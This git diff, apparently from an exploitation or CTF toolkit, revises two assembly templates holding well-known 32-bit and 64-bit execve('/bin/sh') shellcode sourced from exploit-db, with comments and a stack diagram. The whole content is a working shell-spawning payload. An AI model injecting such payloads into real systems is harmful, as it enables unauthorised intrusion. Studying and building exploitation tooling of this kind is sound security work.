2 files changed, 37 insertions, 28 deletions

diff --git a/templates/shellcode/examples/shell32.asm b/templates/shellcode/examples/shell32.asm
index 5ff2e12..6238469 100644
--- a/templates/shellcode/examples/shell32.asm
+++ b/templates/shellcode/examples/shell32.asm
@@ -1,15 +1,16 @@
-[SECTION .text]
-global _start
+; Originally based on https://www.exploit-db.com/shellcodes/46809
+; See shell64.asm for more details.
 
-; https://www.exploit-db.com/shellcodes/46809
-
-_start:
-    xor     ecx, ecx
-    xor     edx, edx
-    push    0xb
-    pop     eax
-    push    ecx
-    push    0x68732f2f
-    push    0x6e69622f
-    mov     ebx, esp
-    int     0x80
+; execve("/bin/sh", ["/bin/sh"], [])
+xor     eax, eax
+xor     ecx, ecx
+push    ecx
+push    0x68732f2f
+push    0x6e69622f
+mov     ebx, esp
+push    ecx
+mov     edx, esp
+push    ebx
+mov     ecx, esp
+mov      al, 11
+int     0x80
diff --git a/templates/shellcode/examples/shell64.asm b/templates/shellcode/examples/shell64.asm
index 2353b6f..3812c33 100644
--- a/templates/shellcode/examples/shell64.asm
+++ b/templates/shellcode/examples/shell64.asm
@@ -1,16 +1,24 @@
-[SECTION .text]
-global _start
+; Originally based on https://www.exploit-db.com/shellcodes/47008
 
-; https://www.exploit-db.com/shellcodes/47008
+; stack layout
+;
+;     ┏━━━━━━━━━━━━━━┓
+;     ┃              v
+;   [ argv0, NULL ] "/bin//sh" NULL
+;     ^      ^       ^
+;     ┃      ┃       ┃
+;     argv   envp    filename
 
-_start:
-    xor     rsi, rsi
-    xor     rdx, rdx
-    push    rsi
-    mov     rdi, 0x68732f2f6e69622f
-    push    rdi
-    push    rsp
-    pop     rdi
-    mov      al, 0x3b
-    cdq
-    syscall
+; execve("/bin/sh", ["/bin/sh"], [])
+xor     rax, rax
+xor     rsi, rsi
+mov     rdi, 0x68732f2f6e69622f
+push    rsi
+push    rdi
+mov     rdi, rsp
+push    rsi
+mov     rdx, rsp
+push    rdi
+mov     rsi, rsp
+mov      al, 59
+syscall